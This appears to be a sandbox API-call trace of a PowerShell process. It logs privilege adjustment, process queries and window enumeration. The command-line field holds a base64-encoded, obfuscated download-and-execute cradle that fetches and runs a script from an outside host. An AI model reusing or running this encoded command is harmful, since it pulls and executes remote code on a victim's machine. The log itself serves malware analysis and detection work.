	[0650.306] GetCurrentProcess () returned 0xffffffffffffffff
	[0650.306] GetCurrentProcess () returned 0xffffffffffffffff
	[0650.307] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x398, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c5fe4e8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c5fe4e8*=0x34c) returned 1

Process:
	id = "57"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x22f19000"
	os_pid = "0xf10"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "8"
	os_parent_pid = "0x74c"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 307
	os_tid = 0xf14

	[0588.623] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0594.198] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0594.199] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0594.199] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0594.199] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0608.872] GetVersionExW (in: lpVersionInformation=0x26dd80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26dd80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0608.874] GetVersionExW (in: lpVersionInformation=0x26dd80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26dd80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0608.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.923] GetVersionExW (in: lpVersionInformation=0x26daf0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26daf0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0609.924] SetErrorMode (uMode=0x1) returned 0x1
	[0609.925] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x26dc50 | out: lpFileInformation=0x26dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0609.927] SetErrorMode (uMode=0x1) returned 0x1
	[0609.931] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x26dec0 | out: lpdwHandle=0x26dec0) returned 0x94c
	[0609.932] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b472a0 | out: lpData=0x2b472a0) returned 1
	[0609.935] VerQueryValueW (in: pBlock=0x2b472a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26de38, puLen=0x26de30 | out: lplpBuffer=0x26de38*=0x2b4733c, puLen=0x26de30) returned 1
	[0609.937] lstrlenW (lpString="䅁") returned 1
	[0609.947] VerQueryValueW (in: pBlock=0x2b472a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x26dda8, puLen=0x26dda0 | out: lplpBuffer=0x26dda8*=0x2b47418, puLen=0x26dda0) returned 1
	[0609.947] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0609.949] CoTaskMemAlloc (cb=0x2e) returned 0x3ef510
	[0609.950] lstrcpyW (in: lpString1=0x3ef510, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0609.951] CoTaskMemFree (pv=0x3ef510) 
	[0609.951] VerQueryValueW (in: pBlock=0x2b472a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x26dda8, puLen=0x26dda0 | out: lplpBuffer=0x26dda8*=0x2b4746c, puLen=0x26dda0) returned 1
	[0609.951] lstrlenW (lpString="System.Management.Automation") returned 28
	[0609.951] CoTaskMemAlloc (cb=0x3c) returned 0x38a010
	[0609.951] lstrcpyW (in: lpString1=0x38a010, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0609.951] CoTaskMemFree (pv=0x38a010) 
	[0609.951] VerQueryValueW (in: pBlock=0x2b472a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x26dda8, puLen=0x26dda0 | out: lplpBuffer=0x26dda8*=0x2b474c8, puLen=0x26dda0) returned 1
	[0609.951] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0609.951] CoTaskMemAlloc (cb=0x20) returned 0x44fb60
	[0609.951] lstrcpyW (in: lpString1=0x44fb60, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0609.951] CoTaskMemFree (pv=0x44fb60) 
	[0609.951] VerQueryValueW (in: pBlock=0x2b472a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x26dda8, puLen=0x26dda0 | out: lplpBuffer=0x26dda8*=0x2b47508, puLen=0x26dda0) returned 1
	[0609.951] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0609.951] CoTaskMemAlloc (cb=0x44) returned 0x38a010
	[0609.951] lstrcpyW (in: lpString1=0x38a010, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0609.952] CoTaskMemFree (pv=0x38a010) 
	[0609.952] VerQueryValueW (in: pBlock=0x2b472a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x26dda8, puLen=0x26dda0 | out: lplpBuffer=0x26dda8*=0x2b47570, puLen=0x26dda0) returned 1
	[0609.952] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0609.952] CoTaskMemAlloc (cb=0x76) returned 0x3f0f20
	[0609.952] lstrcpyW (in: lpString1=0x3f0f20, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0609.952] CoTaskMemFree (pv=0x3f0f20) 
	[0609.952] VerQueryValueW (in: pBlock=0x2b472a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x26dda8, puLen=0x26dda0 | out: lplpBuffer=0x26dda8*=0x2b4760c, puLen=0x26dda0) returned 1
	[0609.952] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0609.952] CoTaskMemAlloc (cb=0x44) returned 0x38a010
	[0609.952] lstrcpyW (in: lpString1=0x38a010, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0609.952] CoTaskMemFree (pv=0x38a010) 
	[0609.952] VerQueryValueW (in: pBlock=0x2b472a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x26dda8, puLen=0x26dda0 | out: lplpBuffer=0x26dda8*=0x2b47670, puLen=0x26dda0) returned 1
	[0609.952] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0609.952] CoTaskMemAlloc (cb=0x58) returned 0x3bbac0
	[0609.952] lstrcpyW (in: lpString1=0x3bbac0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0609.952] CoTaskMemFree (pv=0x3bbac0) 
	[0609.952] VerQueryValueW (in: pBlock=0x2b472a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x26dda8, puLen=0x26dda0 | out: lplpBuffer=0x26dda8*=0x2b476ec, puLen=0x26dda0) returned 1
	[0609.952] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0609.952] CoTaskMemAlloc (cb=0x20) returned 0x44fb60
	[0609.953] lstrcpyW (in: lpString1=0x44fb60, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0609.953] CoTaskMemFree (pv=0x44fb60) 
	[0609.953] VerQueryValueW (in: pBlock=0x2b472a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x26dda8, puLen=0x26dda0 | out: lplpBuffer=0x26dda8*=0x2b47394, puLen=0x26dda0) returned 1
	[0609.953] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0609.953] CoTaskMemAlloc (cb=0x66) returned 0x3c10f0
	[0609.953] lstrcpyW (in: lpString1=0x3c10f0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0609.953] CoTaskMemFree (pv=0x3c10f0) 
	[0609.953] VerQueryValueW (in: pBlock=0x2b472a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x26dda8, puLen=0x26dda0 | out: lplpBuffer=0x26dda8*=0x0, puLen=0x26dda0) returned 0
	[0609.953] VerQueryValueW (in: pBlock=0x2b472a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x26dda8, puLen=0x26dda0 | out: lplpBuffer=0x26dda8*=0x0, puLen=0x26dda0) returned 0
	[0609.953] VerQueryValueW (in: pBlock=0x2b472a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x26dda8, puLen=0x26dda0 | out: lplpBuffer=0x26dda8*=0x0, puLen=0x26dda0) returned 0
	[0609.953] VerQueryValueW (in: pBlock=0x2b472a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26dd78, puLen=0x26dd70 | out: lplpBuffer=0x26dd78*=0x2b4733c, puLen=0x26dd70) returned 1
	[0609.954] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0609.954] VerLanguageNameW (in: wLang=0x0, szLang=0x4469e0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0610.830] CoTaskMemFree (pv=0x4469e0) 
	[0610.830] VerQueryValueW (in: pBlock=0x2b472a0, lpSubBlock="\\", lplpBuffer=0x26ddc8, puLen=0x26ddc0 | out: lplpBuffer=0x26ddc8*=0x2b472c8, puLen=0x26ddc0) returned 1
	[0610.836] GetCurrentProcessId () returned 0xf10
	[0610.858] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x26ccf0 | out: lpLuid=0x26ccf0*(LowPart=0x14, HighPart=0)) returned 1
	[0610.862] GetCurrentProcess () returned 0xffffffffffffffff
	[0610.862] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x26cd10 | out: TokenHandle=0x26cd10*=0x1d0) returned 1
	[0610.864] AdjustTokenPrivileges (in: TokenHandle=0x1d0, DisableAllPrivileges=0, NewState=0x2b4ab18*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0610.865] CloseHandle (hObject=0x1d0) returned 1
	[0611.805] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf10) returned 0x1d0
	[0611.814] EnumProcessModules (in: hProcess=0x1d0, lphModule=0x2b4ab80, cb=0x200, lpcbNeeded=0x26dd28 | out: lphModule=0x2b4ab80, lpcbNeeded=0x26dd28) returned 1
	[0611.816] GetModuleInformation (in: hProcess=0x1d0, hModule=0x13f370000, lpmodinfo=0x2b4adf0, cb=0x18 | out: lpmodinfo=0x2b4adf0*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0611.817] CoTaskMemAlloc (cb=0x804) returned 0x451b80
	[0611.817] GetModuleBaseNameW (in: hProcess=0x1d0, hModule=0x13f370000, lpBaseName=0x451b80, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0611.818] CoTaskMemFree (pv=0x451b80) 
	[0611.818] CoTaskMemAlloc (cb=0x804) returned 0x451b80
	[0611.818] GetModuleFileNameExW (in: hProcess=0x1d0, hModule=0x13f370000, lpFilename=0x451b80, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0611.819] CoTaskMemFree (pv=0x451b80) 
	[0611.819] CloseHandle (hObject=0x1d0) returned 1
	[0611.828] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf10) returned 0x1d0
	[0611.829] GetExitCodeProcess (in: hProcess=0x1d0, lpExitCode=0x26de58 | out: lpExitCode=0x26de58*=0x103) returned 1
	[0612.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12b4b088, Length=0x20000, ResultLength=0x26de20 | out: SystemInformation=0x12b4b088, ResultLength=0x26de20*=0x36c00) returned 0xc0000004
	[0612.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12b6b0b8, Length=0x39400, ResultLength=0x26de20 | out: SystemInformation=0x12b6b0b8, ResultLength=0x26de20*=0x36c00) returned 0x0
	[0613.836] EnumWindows (lpEnumFunc=0x23066ac, lParam=0x0) 
	[0613.838] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.838] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x558
	[0613.838] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.839] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.839] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.839] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x538
	[0613.839] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.839] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x778
	[0613.839] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x778
	[0613.839] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.839] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.840] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.840] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.840] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.840] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.840] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.840] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.840] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x460
	[0613.840] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.841] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x4d0
	[0613.841] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x3a8
	[0613.841] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1bd0
	[0613.841] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1bfc
	[0613.841] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1a78
	[0613.841] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1b90
	[0613.841] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1b04
	[0613.842] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1b34
	[0613.842] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1b64
	[0613.842] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1bb0
	[0613.842] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1acc
	[0613.842] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1a2c
	[0613.842] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x19a8
	[0613.842] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1944
	[0613.842] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x18c8
	[0613.843] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x18ac
	[0613.843] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x18ec
	[0613.843] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1898
	[0613.843] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xc98
	[0613.843] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x153c
	[0613.843] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1808
	[0613.843] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x12a4
	[0613.844] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1740
	[0613.844] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x16c4
	[0613.844] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1820
	[0613.844] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x16ac
	[0613.844] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1858
	[0613.844] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1664
	[0613.844] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x10b4
	[0613.844] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x10ac
	[0613.844] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x10ec
	[0613.845] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1068
	[0613.845] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x17e0
	[0613.845] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x102c
	[0613.845] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x17a4
	[0613.845] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1050
	[0613.845] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1694
	[0613.845] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1770
	[0613.845] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1720
	[0613.846] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x165c
	[0613.846] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1578
	[0613.846] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x16c0
	[0613.846] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x161c
	[0613.846] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1638
	[0613.846] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x15c8
	[0613.846] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1554
	[0613.846] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1674
	[0613.846] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1520
	[0613.847] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x14bc
	[0613.847] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xf8c
	[0613.847] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xe9c
	[0613.847] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1434
	[0613.847] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x14ec
	[0613.847] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xfcc
	[0613.847] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x12ac
	[0613.847] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1484
	[0613.847] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x934
	[0613.847] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xc0c
	[0613.848] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xb08
	[0613.848] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x948
	[0613.848] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x1178
	[0613.848] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x13e0
	[0613.848] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0xcd0
	[0613.848] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x26db80 | out: lpdwProcessId=0x26db80) returned 0x13fc
